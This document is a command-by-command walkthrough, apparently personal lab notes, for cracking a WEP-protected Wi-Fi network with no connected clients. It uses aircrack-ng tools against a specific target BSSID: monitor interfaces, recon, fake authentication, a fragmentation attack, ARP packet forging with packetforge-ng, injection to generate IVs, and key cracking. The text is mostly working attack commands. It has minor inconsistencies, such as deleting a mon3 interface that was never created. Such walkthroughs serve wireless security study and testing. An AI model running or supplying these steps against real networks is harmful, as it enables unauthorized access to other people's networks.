- Create the wireless monitor interface(s).
sudo iw wlan1 interface add mon0 type monitor
sudo iw wlan1 interface add mon1 type monitor
sudo iw wlan1 interface add mon2 type monitor
2. Recon and gather info using any of the monitor mode interfaces.
sudo airodump-ng --band abg mon0
Take note of the BSSID, channel, encryption, Cipher, and ESSID.
Once the BSSID/ESSID is obtained, execute a filtered capture on the target network.
$ sudo airodump-ng --channel 11 --bssid 20:AA:4B:4A:93:F7 -w WIFOO-ATTACK-2 mon0 --ignore-negative-one
3. Document the BSSID of the AP, the channel, and the MAC address of the monitor mode interface.
echo victim 20:AA:4B:4A:93:F7 > attackinfo
echo channel 11 >> attackinfo
echo mon0 00-C0-CA-88-8B-69 >> attackinfo
4. Initiate a “fake” authentication with the access point using aireplay-ng.
sudo aireplay-ng --fakeauth 60 -a 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one
Executing the command will cause the monitor mode interface to associate with the AP.
Inspection of the airodump-ng capture shows that the AP accepted the association.
For the WEP attack to work, the association must be valid. The previously executed command will maintain a continuous connection.
5. Execute the fragmentation attack using aireplay. Reference: https://www.aircrack-ng.org/doku.php?id=fragmentation
aireplay-ng --fragment -b 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one
6. Generate an arp packet using packetforge-ng via the .xor file. This file will be used to inject packets into the network.
The goal of the injection is to increase the data going to the AP quickly. But unfortunately, there are only 300+ data frames, which is insufficient to crack WEP.
└─$ sudo packetforge-ng -0 -a 20:AA:4B:4A:93:F7 -h 00-C0-CA-88-8B-69 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0316-175707.xor -w clientlessinject
7. Next, inject the packet into the network using aireplay-ng with the interactive option. This should cause the AP to generate weak IVs.
└─$ sudo aireplay-ng --interactive -r clientlessinject mon0
The AP should now generate large amounts of IVs which can be used to crack WEP.
8. With 10,000 IVs collected, it’s time to try cracking the key using the .cap file that is being logged. Run the crack with injection running. The more frames, the better.
sudo aircrack-ng -0 WIFOO-ATTACK-2-01.cap
The key length shouldn’t matter once many IVs are collected.
Delete the monitor mode interfaces.
sudo iw dev mon0 del
sudo iw dev mon2 del
sudo iw dev mon1 del
sudo iw dev mon3 del